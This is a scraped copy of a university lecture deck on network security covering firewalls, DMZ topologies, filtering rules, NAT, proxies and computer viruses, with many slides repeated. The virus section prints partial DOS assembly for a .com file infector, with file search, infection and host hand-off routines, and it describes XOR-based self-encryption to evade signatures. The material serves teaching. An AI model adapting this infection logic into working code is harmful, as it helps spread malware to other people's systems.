66
Security in Information Systems: Lecture Notes in Network Security Due on February 3, 2011 Department of Computer Architecture (DAC) Universitat Polit` ecnica de Catalunya (UPC) Jordi Nin 1

Lecture 7 CMP4103 Computer Network Security - Firewalls

Embed Size (px)

Citation preview

Page 1: Lecture 7 CMP4103 Computer Network Security - Firewalls

Security in Information Systems: Lecture Notes in

Network SecurityDue on February 3, 2011

Department of Computer Architecture (DAC)

Universitat Politecnica de Catalunya (UPC)

Jordi Nin

1

Page 2: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS

2 - Network Security

Jordi Nin

[email protected]

Department of Computer Architecture (DAC)Universitat Politecnica de Catalunya (UPC)

Security in Information Systems (SSI)

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and Trojans

3 Point to Point Security

Jordi Nin 2 - Network Security and Protection

Page 3: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Contents

1 Perimetral Security: FirewallsIntroductionFirewall TopologiesFiltering RulesApplication Level Filtering

2 Viruses, Worms and Trojans

3 Point to Point Security

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Definition

A firewall is a part of a computer system or network designed toblock unauthorized access while permitting authorized commu-nications. It is a device or set of devices that is configured topermit or deny network transmissions based on a set of rulesand other criteria.

When we need a firewall?

Anytime we need to connect a secure network to an insecurenetwork

Jordi Nin 2 - Network Security and Protection

Page 4: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Possible Attacks

Regarding Donn B. Parker senior consultant form StanfordResearch Institute:

• Tampering or Data Diddling → false data insertion

• Trojan Horse → a program not acting as expected

• Data leakage → unauthorized data dissemination

• Spoofing → use another computers IP address

• Denial of Service attacks

• ...

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Preliminary Definitions

• Firewall: used to refer to the security policy and securitystrategies

• Firewall system: set of hardware and softwareimplementing a firewall

• Bastion Host: a secure host exposed to an insecurenetwork

• Packet: basic Internet communication unit (datagrama)

• Dual-homed host: a computer with two network interfaces

• Network perimeter or Demilitarized Zone (DMZ): Anetwork added between the insecure network and thesecure network that we need to protect

Jordi Nin 2 - Network Security and Protection

Page 5: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Types of Firewall

• Packet filter: Packet filtering inspects each packetpassing through the network and accepts or rejects itbased on user-defined rules

• Circuit-level firewall: Applies security mechanisms whena TCP or UDP connection is established. Once theconnection has been made, packets can flow between thehosts without further checking

• Application gateway: Applies security mechanisms tospecific applications, such as FTP and Telnet servers

• Proxy server: Intercepts all messages entering andleaving the network acting as an intermediary betweenclients and servers. The proxy server hides the truenetwork addresses

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Why not implement security in the hosts?

There are many reasons, as for example...

• administrate the security in many points is more difficultthan in a single one

• hosts executes a large amount of programs, i.e. the riskincreases

• network monitoring becomes easier

• internal network structure is hidden

• ...

Jordi Nin 2 - Network Security and Protection

Page 6: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

What can a firewall do?

• It provides a single point of defense, allowing a controlledand audited access to services provided

• It reinforces the own system’s security

• It implements a security policy to access the securenetwork

• It can monitor incoming / outcoming traffic

• It can limit the exposure to an insecure network

• It may become the point to take security decisions sinceall traffic goes across

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

What cannot a firewall do?

• It cannot protect the network against malicious attacksfrom inside of the secure network

• It cannot protect the network against traffic not goingacross it

• It cannot protect the network against the bugs ofauthorized services

• Any application data going across has the potential ofcausing problems (i.e. Trojans)

• If security policy is not deny by default, it cannot protectthe network against new attacks

Jordi Nin 2 - Network Security and Protection

Page 7: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Contents

1 Perimetral Security: FirewallsIntroductionFirewall TopologiesFiltering RulesApplication Level Filtering

2 Viruses, Worms and Trojans

3 Point to Point Security

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

A Simple Dual-Homed Firewall

The dual-homed firewall is one of the simplest way to use a firewall. TheInternet comes into the firewall directly via a dial-up modem. You can’thave a DMZ.

Firewall

InternetSwitch or Hub

NetWare Server

Desktop PC

The firewall takes care of passing packets that pass its filtering rulesbetween the internal network and the Internet, and vice versa. The two”homes” refer to the two networks that the firewall is part of - one

interface connected to the outside network, and the other connected tothe inside network

Jordi Nin 2 - Network Security and Protection

Page 8: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

A Two-Legged Network with a full exposed DMZThe router (Internet access) is connected to a hub. Servers that wantdirect access to the outside world (unfiltered by the firewall) and one ofthe firewall’s net adapters connect also to this hub. The other firewall’snet adapter connects to the internal hub. PC that need to be protected

are connected to this second hub

Internal Network

Firewall

InternetSwitch or Hub

DMZ Zone

Public Webserver Public Mailserver

Switch or Hub

Desktop PC

Netware Server

Public Network

• Advantages: The firewall needs only two network cards. Thissimplifies the configuration of the firewall

• Drawbacks: DMZ network is totally exposed to the Internet

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Restricted DMZ via Dialup Firewall

To protect the DMZ network one solution is to build a secondrouter/firewall. This is useful if PPP is used. One machine is the exteriorrouter/ firewall (1). It is responsible for creating the PPP connection and

controls the access to the DMZ zone. Firewall 2 is a standarddual-homed host and its job is to protect the internal network

Internal Network 1

Internal Network 2

Firewall 1 ppp dialup

Internet

Switch or Hub

DMZ Zone

Public Webserver Public Mailserver

Switch or Hub

Desktop PC

Netware Server

Firewall 2

Jordi Nin 2 - Network Security and Protection

Page 9: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

The Three-legged firewall

We need to add one network card in the firewall for the DMZ

Internal Network 1

Internal Network 2

Firewall

Internet

Switch or Hub

DMZ Zone

Public Webserver Public Mailserver

Switch or Hub

Desktop PC

Netware Server

• Advantages:DMZ IPmasquerade ispossible, only onepublic IP addressis needed

• Drawbacks: oneextra net card →additionalcomplexity

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Contents

1 Perimetral Security: FirewallsIntroductionFirewall TopologiesFiltering RulesApplication Level Filtering

2 Viruses, Worms and Trojans

3 Point to Point Security

Jordi Nin 2 - Network Security and Protection

Page 10: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Basic Security policies

• Allow access to a service unless it is explicitly denied• More comfortable for users• Easier to administer• Less secure → it can’t prevent unknown attacks or bugs

• Deny access to a service unless it is explicitly allowed• More secure since it is very difficult to know whichservices are secure and which are not

• More restrictive and less comfortable for users

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Filtering Rules

Filtering rules are a set of rules for filtering/allowing certainnetwork traffic containing a certain port number, protocoltype, ...

Possible filtering criteria

• Origin/destination address (or network)

• Origin/destination port numbers (well-known or private)

• Protocol type (IP/TCP/UDP/ICMP)

• Connection establishment

Jordi Nin 2 - Network Security and Protection

Page 11: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Filtering Rule Format

iprule position action [filtering options]

• position: rule order

• action: {PERMIT | DENY}• options:

• −i : input interface• −o: output interface• −p: com. protocol → {IP | TCP | UDP | ICMP}• −s: source IP→{NETID+WILDCARD|HOST+IP|ANY}• −d : dest. IP →{NETID+WILDCARD|HOST+IP|ANY}• −sport: source port → [port number:port number]• −dport: dest. port → [port number:port number]• −state: connection state → {NEW,ESTABLISHED}

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Wildcards

A wildcard mask is a 32 bit mask. It points out the IP addressbits that have to be checked. The 0 mask bits indicate thatthe corresponding IP address bits have to be checked and 1otherwise.

Example

• 145.34.5.6 0.0.0.0 → host 145.34.5.6

• 145.34.5.6 255.255.255.255 → ANY

• 145.34.5.6 0.0.0.255 → 145.34.5.0/24

Jordi Nin 2 - Network Security and Protection

Page 12: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Filtering Rules & Net Interfaces

Firewall

Internet Internal Network

eth0 out

eth0 in eth1 out

eth1 in

Example

Internal hosts only access to WWW service and nothing else

• Rule set 1:• iprule 1 permit -p TCP -i eth1 -o eth0 -dport 80• iprule 2 deny -i eth1 -o eth0• iprule 3 permit

• Rule set 2:• iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80• iprule 2 deny -i eth0 -o eth1• iprule 3 permit

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Filtering Rules & Net Interfaces

Firewall

Internet Internal Network

eth0 out

eth0 in eth1 out

eth1 in

Example

Internal hosts only access to WWW service and nothing else

• Rule set 1:• iprule 1 permit -p TCP -i eth1 -o eth0 -dport 80• iprule 2 deny -i eth1 -o eth0• iprule 3 permit

• Rule set 2:• iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80• iprule 2 deny -i eth0 -o eth1• iprule 3 permit

Jordi Nin 2 - Network Security and Protection

Page 13: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Rule Order

Rules are only checked until a packet matches!

These two rules sets are completely different:

Rule set 1• iprule 1 deny -p ICMP

• iprule 2 permit -p IP

Rule set 2• iprule 1 permit -p IP

• iprule 2 deny -p ICMP

The first rule set rejects all the ICMP packets while they areaccepted with the second set (IP includes ICMP)

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Rule Order

Rules are only checked until a packet matches!

These two rules sets are completely different:

Rule set 1• iprule 1 deny -p ICMP

• iprule 2 permit -p IP

Rule set 2• iprule 1 permit -p IP

• iprule 2 deny -p ICMP

The first rule set rejects all the ICMP packets while they areaccepted with the second set (IP includes ICMP)

Jordi Nin 2 - Network Security and Protection

Page 14: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Hiding Network Internals

Firewalls hide the structure of internal networks, but how?

NAT (Network Address Translation)

NAT is the process of modifying network address informationin IP packet headers while in transit across a traffic routing

device for the purpose of remapping one IP address space intoanother

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Hiding Network Internals

Firewalls hide the structure of internal networks, but how?

NAT (Network Address Translation)

NAT is the process of modifying network address informationin IP packet headers while in transit across a traffic routing

device for the purpose of remapping one IP address space intoanother

Jordi Nin 2 - Network Security and Protection

Page 15: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Types of NAT

NAT is out of the scope of this subject... just a small reminder

Address classification• Inside local address: internal IP address in the internalnetwork

• Inside global address: internal IP address in the Internet

• Outside local address: external IP address in the internalnetwork

• Outside global address: external IP address in the Internet

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Types of NAT

NAT is out of the scope of this subject... just a small reminder

• static NAT: direct mapping between the inside local andglobal addresses. Internal hosts can be accessed from theInternet

Mapping of static addresses:ip nat inside source static local-@ global-@Definition of the internal interface:ip nat inside network-interfaceDefinition of the external interface:ip nat outside network-interface

Jordi Nin 2 - Network Security and Protection

Page 16: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Types of NAT

NAT is out of the scope of this subject... just a small reminder

• dynamic NAT: a set of global addresses are dynamicallyassigned. An Internal host has a different IP each time itaccesses to the Internet

Creation of a global address set:ip nat pool name start-@ end-@Access-list to identify the addresses to be translated:access-list id permit network wildcardMapping of dynamic NAT:ip nat inside source list id pool nameDefinition of the internal / external interfaces:ip nat inside network-interfaceip nat outside network-interface

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Types of NAT

NAT is out of the scope of this subject... just a small reminder

• PAT: All internal hosts share the same internal global IP,ports are modified to avoid collisions

Access-list to identify the addresses to be translated:access-list id permit network wildcardMapping of dynamic NAT:ip nat inside source list id interface nameoverloadDefinition of the internal / external interfaces:ip nat inside network-interfaceip nat outside network-interface

Jordi Nin 2 - Network Security and Protection

Page 17: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Contents

1 Perimetral Security: FirewallsIntroductionFirewall TopologiesFiltering RulesApplication Level Filtering

2 Viruses, Worms and Trojans

3 Point to Point Security

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Description

a proxy server is a server that acts as an intermediary for requests fromclients seeking resources from other servers

General procedure

1 A client connects to the proxy server, requesting a service (a file orweb page) available from a different server

2 The proxy server evaluates the request according to its filtering rules

3 If the request is validated by the filter, the proxy provides theresource by connecting to the relevant server and requesting theservice on behalf of the client

Jordi Nin 2 - Network Security and Protection

Page 18: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Possible Applications

• To keep machines behind it anonymous

• To speed up access to resources (using caching)

• To apply access policy to network services or content, e.g.to block undesired sites

• To log / audit usage

• To scan transmitted content for malware before delivery

• To scan outbound content, e.g. for data leak protection

• To circumvent regional restrictions

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Proxy Types and Functions I

• Caching proxy servers accelerate service requests by retrieving content savedfrom a previous request. They keep local copies of frequently requestedresources

• Web proxy servers serve as a web cache. Most proxy programs provide a wayto deny access to URLs specified in a blacklist (content filtering). Some webproxies also reformat web pages for a specific purpose or audience, such as forcell phones and PDAs

• Anonymous proxy servers attempt to anonymize web traffic

• Open proxy (without access control): the web server receives requestsfrom the anonymizing proxy server, and thus does not receiveinformation about the end user’s address. (note that, the requests arenot anonymous to the anonymizing proxy server)

• Close proxy (with access control): authorized users must log on to gainaccess to the web. The proxy administrator (a company) can therebytrack usage to individuals

Jordi Nin 2 - Network Security and Protection

Page 19: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Topologies Rules Proxy

Proxy Types and Functions II

• Intercepting (transparent) proxy servers combine a proxy server with agateway or router (with NAT capabilities). Connections made by client browsersthrough the gateway are diverted to the proxy without client-side configuration(or knowledge). They are commonly used in businesses to prevent avoidance ofacceptable use policy, and to ease administrative burden.

• Reverse proxy is a server installed in the neighborhood of one or more web(application) servers. All traffic coming from the Internet and with adestination to the ’client’ servers goes through the proxy server. There areseveral reasons for installing reverse proxy servers:

• Encryption / SSL acceleration: Different final server clients share thesame ssl key

• Load balancing: connections are distributed among several servers• Security: it is an additional layer of defense and it can protect against

some OS and WebServer specific attacks. However, it does not provideany protection to attacks against the web application or service itself

• Additional services: Data compression, caching of static content

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and TrojansIntroductionViruses Main componentsAntivirus

3 Point to Point Security

Jordi Nin 2 - Network Security and Protection

Page 20: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Historical evolution

The word virus has become a generic term describing a numberof different types of attacks on computers using malicious code

1949, Bell Computer labs, 3 junior programmers: create agame called CoreWar. The object of the game is to cause allprocesses of the opposing program(s) to terminate, leaving

your program in sole possession of the machine

Consequence → the computer crashes!

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Economic cost

it is a safe bet that billions of dollars worth of damage havebeen done over the three decades since malicious code hit thebig time (1980)

Why?

• Inactivity time due to the infection

• Cost of the cleaning time

• Cost of the counter measures (Antivirus)

Jordi Nin 2 - Network Security and Protection

Page 21: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Viruses and Public Health

Why do you take care about malicious code?

• You would not want to become a carrier of some awfuldisease → neither your computer

• but also in using your machine to infect others

A classic example of a virus is the software used to create aDDoS attack

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Difference between Virus and Worm

Virus

A virus is a code fragment that copies itself into a largerprogram, modifying that program and depending on it. A virusexecutes only when its host program begins to run. The virusthen replicates itself, infecting other programs as it reproduces

Worm

A worm is an independent program that reproduces by copyingitself from one computer to another, usually over a network.Unlike a virus, a worm keeps its independence; it usuallydoesn’t modify other programs

Jordi Nin 2 - Network Security and Protection

Page 22: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Trojan horses

A Trojan horse is a code fragment that hides inside a programand performs a disguised function

Example

• A Trap door is a mechanism built into a system by itsdesigner. Its function is to give the designer a way tosneak back into the system, circumventing normal systemprotection

• A Masquerade is a generic name for a program thattricks an unsuspecting user into giving away privileges.

• A Spoof is a technique used for misdirection andconcealment (to hide). For instance, a communicationthat the sender wishes to transmit anonymously is taggedwith a false return address

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Malware Categories

Malware Incubation / Hidden Propagation / Payload /Type Latency on Host Replication Attack

Worm Short Not Automatic Fixed

Virus Medium Yes Automatic Fixed

Trojan Long Yes (not) Manual Fixed

Spyware Long(infinite) Yes Automatic (manual) Fixed

Bots Long Yes (not) Automatic Remote Control

Jordi Nin 2 - Network Security and Protection

Page 23: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and TrojansIntroductionViruses Main componentsAntivirus

3 Point to Point Security

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Viruses Schema

A virus has two components:

• Replication: The survival of a virus is based in its ability toreproduce

... So how do I make a program reproduce? ...Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them

• Payload: It is usually activated just after the replication step or by

a trigger, such as a date, and it performs a set of bad things like:

• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU

for DES keysearch)

Jordi Nin 2 - Network Security and Protection

Page 24: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Viruses Schema

A virus has two components:

• Replication: The survival of a virus is based in its ability toreproduce ... So how do I make a program reproduce? ...

Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them

• Payload: It is usually activated just after the replication step or by

a trigger, such as a date, and it performs a set of bad things like:

• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU

for DES keysearch)

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Viruses Schema

A virus has two components:

• Replication: The survival of a virus is based in its ability toreproduce ... So how do I make a program reproduce? ...Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them

• Payload: It is usually activated just after the replication step or by

a trigger, such as a date, and it performs a set of bad things like:

• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU

for DES keysearch)

Jordi Nin 2 - Network Security and Protection

Page 25: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Viruses Schema

A virus has two components:

• Replication: The survival of a virus is based in its ability toreproduce ... So how do I make a program reproduce? ...Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them

• Payload: It is usually activated just after the replication step or by

a trigger, such as a date, and it performs a set of bad things like:

• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU

for DES keysearch)

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Viruses Schema

A virus has two components:

• Replication: The survival of a virus is based in its ability toreproduce ... So how do I make a program reproduce? ...Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them

• Payload: It is usually activated just after the replication step or by

a trigger, such as a date, and it performs a set of bad things like:

• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU

for DES keysearch)

Jordi Nin 2 - Network Security and Protection

Page 26: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Viruses Schema

Basic Virus Procedure

1 Search for a file to infect

2 Open the file to see if it is infected

3 If infected, search for another file

4 Else, infect the file

5 If payload execution conditions are met, it is executed

6 Return control to the host program

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Example of a Simple Virus (hello world!) I

com file Virus

Disk Main Memory

com_size code data0 3jump

Virus Assembler Codevcode segment ’code’

org 100h

assume cs:vcode,ds:vcode,es:vcode

start proc far

begin:

push cs push cs ;Store CS twice

pop ds pop es ;Bring ds, es out

call fake proc ;IP in the stack

fake proc proc near

fake proc endp

pop bp ;bp<- proc. addr.

sub bp,107h ;bp at the begining

Virus Assembler Databuffer db 7d dup(0)

length db 2 dup(0)

file inf db ’*.COM’,0

jump db ’e’,0 ;<-jump ascii

start endp ;End of main procedure

codigo ends ;end of code segment

end begining ;END. Go to begining

Jordi Nin 2 - Network Security and Protection

Page 27: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Example of a Simple Virus (hello world!) II

1 Search for a file

2 Open the file to see if it is infected

Virus Replication Code;Find the first .com file in the directory

mov ah, 4eh

lea dx, bp+file inf ;DS:DX=offset of file inf

mov cx,000h ;Entry attributes

int 21h

;Open file

mov ah, 3dh ;Open the file operation

mov al, 00000010b ;read/write

mov dx, 009eh ;DX<- DTA(filename) offset

int 21h ;put the handle in AX

push ax ;and store in stack

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Example of a Simple Virus (hello world!) III

4 Else, infect the file

5 If payload execution conditions are met, it is executed

6 Return control to the host program

Virus Infection Code (I);save the initial information of .com file

pop bx push bx ;take the handle from the stack to BX and store it again

mov ah, 3fh ;Read file

mov cx, 0003h ;Read 3 bytes

lea dx, bp+buffer ;and store them in the buffer (data segment)

int 21h

mov ax, 4200h ;move the write pointer to the beginning of the program

mov cx, 0000h mov dx,0000h

int 21h

;Write the first byte (jmp)

mov ah,40h mov cx,1d lea dx,bp+jump

int 21h ;write the first byte of the jump and store DX<- jump offset

Jordi Nin 2 - Network Security and Protection

Page 28: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Example of a Simple Virus (hello world!) III

4 Else, infect the file

5 If payload execution conditions are met, it is executed

6 Return control to the host program

Virus Infection Code (II);Calculating file length

mov cx,2 mov si,009ah ;SI <- DTA offset

lea di, bp+ length ;DI <- File length offset

rep movsb ;copy

;Complete the jump instruction

mov ah, 40h mov cx, 2d lea dx,bp+ length

int 21h ;dx<- length offset

;Move pointer to end

mov ax, 4202h ;Move the write pointer to the end of the program

mov cx, 0000h mov dx, 0000h

int 21h

add word ptr [bp+ length],3 ;Restore length

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Example of a Simple Virus (hello world!) III

4 Else, infect the file

5 If payload execution conditions are met, it is executed

6 Return control to the host program

Virus Infection Code (III);Copy the virus to the program

pop bx ;Restore the handle

mov ah, 40h mov cx, length ;number of bytes to copy

lea dx, bp+begining ;Start copying from....

int 21h

printf "hello world!" ;Payload execution

;Copy the buffer containing the first 3 bytes of the file into memory

mov cx, 0003h mov di, 0100h

lea si, bp+buffer rep movsb

mov ax, 0100h ;Address needed to execute the host

jmp ax

Jordi Nin 2 - Network Security and Protection

Page 29: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Graphical Description

Step 0 Step 1 (failure)

com file

length

com file

length

virus

jmp

buffe

r

Step 2 (com executes)

com file

length

virus1

jmp

orig

inal

virus2

jmp

v1

Note that, second virus infection is executed first

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Contents

1 Perimetral Security: Firewalls

2 Viruses, Worms and TrojansIntroductionViruses Main componentsAntivirus

3 Point to Point Security

Jordi Nin 2 - Network Security and Protection

Page 30: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

General Description

Virus protection software uses two main techniques.

• Signatures, antivirus (AV) solutions have relied stronglyon signature-based scanning, also referred to as scanstring-based technologies. The signature-based scanengine searches within given files for the presence ofcertain strings (often also only in certain regions). Ifthese predefined strings are found, certain actions likealarms can be triggered.

• Periodical analysis, the virus protection program can golooking for trouble. It can scan the various disks andmemories of the computer, detecting and reportingsuspicious code segments, and placing them in quarantine.

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Signature problem!

Signature-based virus protection programs require a constantflow of new signatures in response to evolving attacks.Vendors stay alert for new viruses, determine the signatures,and then make them available as updated virus definitiontables to their users. Usually, users download new signaturesfrom the WWW periodically

Zero Day problem: It occurs when a user finds a new virus beforethe publisher discovers it and can issue an updated signature.

Jordi Nin 2 - Network Security and Protection

Page 31: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Signature problem!

Signature-based virus protection programs require a constantflow of new signatures in response to evolving attacks.Vendors stay alert for new viruses, determine the signatures,and then make them available as updated virus definitiontables to their users. Usually, users download new signaturesfrom the WWW periodically

Zero Day problem: It occurs when a user finds a new virus beforethe publisher discovers it and can issue an updated signature.

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Even worse: Mutation!

just as with biological pathogens, viruses can mutate to eludesignature detection

... but how?...They have several options:

• a virus uses a file compression software to change itssignature when it is not active

• a virus changes its own form by introducing extra uselessstatements or adding random numbers

• a virus encrypts itself, only leaving a small headercontaining the code and random key to decrypt

Jordi Nin 2 - Network Security and Protection

Page 32: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Even worse: Mutation!

just as with biological pathogens, viruses can mutate to eludesignature detection ... but how?...

They have several options:

• a virus uses a file compression software to change itssignature when it is not active

• a virus changes its own form by introducing extra uselessstatements or adding random numbers

• a virus encrypts itself, only leaving a small headercontaining the code and random key to decrypt

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Even worse: Mutation!

just as with biological pathogens, viruses can mutate to eludesignature detection ... but how?...They have several options:

• a virus uses a file compression software to change itssignature when it is not active

• a virus changes its own form by introducing extra uselessstatements or adding random numbers

• a virus encrypts itself, only leaving a small headercontaining the code and random key to decrypt

Jordi Nin 2 - Network Security and Protection

Page 33: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Mutation examples

• a dummy mutation:

• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction

• not so dummy but still simple mutation:• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �

AV Countermeasure: heuristic search methods

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Mutation examples

• a dummy mutation:• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction

• not so dummy but still simple mutation:• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �

AV Countermeasure: heuristic search methods

Jordi Nin 2 - Network Security and Protection

Page 34: Lecture 7 CMP4103 Computer Network Security - Firewalls

Firewalls Viruses PPS Introduction Logic Antivirus

Mutation examples

• a dummy mutation:• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction

• not so dummy but still simple mutation:

• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �

AV Countermeasure: heuristic search methods

Jordi Nin 2 - Network Security and Protection

Firewalls Viruses PPS Introduction Logic Antivirus

Mutation examples

• a dummy mutation:• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction

